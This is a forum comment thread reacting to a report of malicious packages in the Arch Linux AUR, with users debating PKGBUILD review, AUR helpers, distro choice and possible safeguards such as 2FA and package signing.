The security situation with the Arch Linux AUR got a lot worse

Uh oh.

It's a grim reminder that one should ALWAYS check the PKGBUILD files.

If you haven't, it's about time to start!

Damnit, i had minitube installed, but not started it for months... fresh install with full password rotation, i guess?

The problem is they can't rethink it without essentially killing it.

The near complete lack of oversight and controls is basically the AUR's one feature that distinguishes it from everything else out there.

Last edited by mattaraxia on 14 Jun 2026 at 8:46 pm UTC

Calling it "obfuscated code" is a pretty large exaggeration. They're just using string concatenation to make it the text less human readable, it's not hiding what the instructions actually do. If anything this makes it more noticeable.

Quoting: CharlieTheMadHatterIt's a grim reminder that one should ALWAYS check the PKGBUILD files.

If you haven't, it's about time to start!

No one's going to check all the build files of every package on every update they use.

Quoting: kerossin

Quoting: CharlieTheMadHatterIt's a grim reminder that one should ALWAYS check the PKGBUILD files.

If you haven't, it's about time to start!

No one's going to check all the build files of every package on every update they use.

The best "solution" imo is to simply not update AUR packages often. I seldom run "paru -Syu".

Luckily for me, I have only a few (10-ish) AUR packages, and none of them seemed to have been compromised.

Last edited by coolitic on 14 Jun 2026 at 9:14 pm UTC

Quoting: ChrisznixDamnit, i had minitube installed, but not started it for months... fresh install with full password rotation, i guess?

Did you update the package through AUR in the last few days without checking the PKGBUILD?

Quoting: kerossinNo one's going to check all the build files of every package on every update they use.

You do not have to. AUR helpers like paru will show a diff for updates which in the best case only consist of changed version numbers and hashes.

But yes, those diffs should be checked for each and every update.

Quoting: kerossinNo one's going to check all the build files of every package on every update they use.

It's only the AUR which is compromised, not the actual Arch repositories, where the vast majority of the installed packages will come from. And if you have more than, say, half a dozen AUR packages installed; then you're doing it wrong and you should probably use something like Debian where pretty much everything you could want is available from official repos.

Quoting: kerossinNo one's going to check all the build files of every package on every update they use.

"No one" is too much of a stretch. I'm among the people who, yes, literally checks the contents of every PKGBUILD I've ever used (along with the contents of any bundled patches / ancillary files / etc). I've actually never used any helper apps for AUR content; I download manually, verify the contents of the PKGBUILD, verify that the package sources are set up properly, in many cases do checksum management myself, etc. Yeah, it's a lot more work, and it means that I'm constantly balancing the hassle of doing so versus Not Actually Using The Thing, but it's always struck me as the only sensible thing to do. The general community acceptance of automated AUR helpers which just blindly trust that source has always struck me as totally insane, and among the things I don't like about Arch.

Though amend "no one" to be "practically no one" and I'll agree. I'm sure people like me are in a very small minority.

Last edited by apocalyptech on 14 Jun 2026 at 9:34 pm UTC

Quoting: cooliticThe best "solution" imo is to simply not update AUR packages often. I seldom run "paru -Syu".

Luckily for me, I have only a few (10-ish) AUR packages, and none of them seemed to have been compromised.

I got 35 from the AUR and I'm fine, nothing compromised. I think the only thing they need to do is add a really scary warning on the AUR page and perhaps on some of the AUR helpers, just to really let people know the risks they're taking by downloading anything from there without checking the PKGBUILDs.

So what distro is safe now? Anyone know a gaming centered disrto not based on arch? I was using cachyOS but im ready to try anything thats fast stable and not arch based, Anyone??

So what distro is safe now?

Arch is still safe, this only affects the AUR which is disabled by default on vanilla Arch at least. CachyOS should also be fine. Vanilla Arch packages are unaffected by this.

Quoting: shadowofwardSo what distro is safe now? Anyone know a gaming centered disrto not based on arch? I was using cachyOS but im ready to try anything thats fast stable and not arch based, Anyone??

As long as you either:
a) Didn't download anything from the AUR
or
b) Were careful if you did

You're fine. While this is pretty bad, this is honestly normal. This has happened before. If you're new to Arch, the AUR is basically the wild west, but it's also supposed to be that way. Packages in the AUR are not vetted, and you're expected to vet them on your own. Tbf, the warnings from tutorials on the internet and the Arch maintainers concerning the risks attached to the AUR aren't scary enough to let people know that by carelessly using the AUR, you will FAFO. It falls in line with Arch's DIY spirit.

If you still wanna use the AUR, here are some tips if you're uninitiated:

• Always read the PKGBUILD script.


• Look into who the package's maintainer is.


• Don't autopilot your updates. Read carefully.

There's no shame in choosing not to use the AUR. You don't need it anyway.

Last edited by Slaxer on 15 Jun 2026 at 1:36 am UTC

Quoting: shadowofwardSo what distro is safe now? Anyone know a gaming centered disrto not based on arch? I was using cachyOS but im ready to try anything thats fast stable and not arch based, Anyone??

The real answer is for people to get over the idea of rolling distros, they've always been dangerous like this, and always will be. Most people don't actually need the latest and greatest, or only need very specific things that are. It's mostly a mindset. Frankly most of the time the dependencies on latest packages don't come from need at all, it comes from that being what was the latest when the developer started their project.

In the professional world things like immutable distros and verified images and such are coming full circle to "solve" this problem that never used to exist used to be a niche crowd. Or you know, flatpaks, snaps, appimages, pick one - they're all solutions to the same issue.

Last edited by dibz on 15 Jun 2026 at 1:26 am UTC

Wow this is bad, and yeah I agree with @mattaraxia ... how COULD they rethink it? Honestly, when arch had a small installbase and linux had such a small usergroup, it was fine to have wild west places like the aur. Nowadays? Not so much.

I hate to say this, but ... might be time for aur to gracefully say goodnight. It had a good run (it really did!) but in its current form there's no way this kind of stuff doesn't continue just even worse and even faster.

I checked, and I do have two applications from the AUR:
cider
anydesk
... and it looks like both are now avail as flats! So I will promptly move these two off of aur into flatpak and never look back at aur again.

Quoting: dibz

Quoting: shadowofwardSo what distro is safe now? Anyone know a gaming centered disrto not based on arch? I was using cachyOS but im ready to try anything thats fast stable and not arch based, Anyone??

The real answer is for people to get over the idea of rolling distros, they've always been dangerous like this, and always will be.

ummmmm excuse me what on earth?

I'm not sure so I just have to ask: do you understand what we are even talking about here? This has nothing to do whatsoever with the distro itself, or if its rolling or not rolling. Rolling distros are 100% not "always dangerous" that's the most preposterous thing I've ever heard.

Quoting: SonarDid you update the package through AUR in the last few days without checking the PKGBUILD?

No, i think i did not! Have to check after work to be sure about it. Thank you, friend! :)

Quoting: CharlieTheMadHatterIt's a grim reminder that one should ALWAYS check the PKGBUILD files.

If you haven't, it's about time to start!

Aside from the discussion about wether people actually do that, can the average joe actually read a PKGBUILD file and determine wether it is safe?

Also, I understand that this has been the attitude in the Arch/DIY community, but with so many packages being compeomised, this is a system failing, and that's not the users fault. There are many security measures from the package manager and programming language package manager world that can (and should) be applied, like mandatory 2-FA, package signing/trusted publisher, cooldown periods, a trust system (if package has less than installs, show a warning), etc. Loads of these can be implemented without changing the character of the AUR.

Last edited by Adutchman on 15 Jun 2026 at 6:33 am UTC